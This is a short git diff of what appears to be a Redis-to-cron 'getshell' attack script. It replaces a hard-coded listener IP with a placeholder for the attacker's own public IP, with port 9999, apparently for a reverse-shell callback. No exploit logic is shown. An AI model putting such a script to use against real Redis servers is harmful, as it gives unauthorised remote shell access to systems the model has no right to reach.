diff --git a/script/redis-cron-getshell.py b/script/redis-cron-getshell.py index e6ebee1..d431a33 100644 --- a/script/redis-cron-getshell.py +++ b/script/redis-cron-getshell.py @@ -12,7 +12,7 @@ from plugin.util import host2IP from plugin.util import randomString -listen_ip = '115.28.1.1' +listen_ip = 'x.x.x.x' # your public IP and Port listen_port = 9999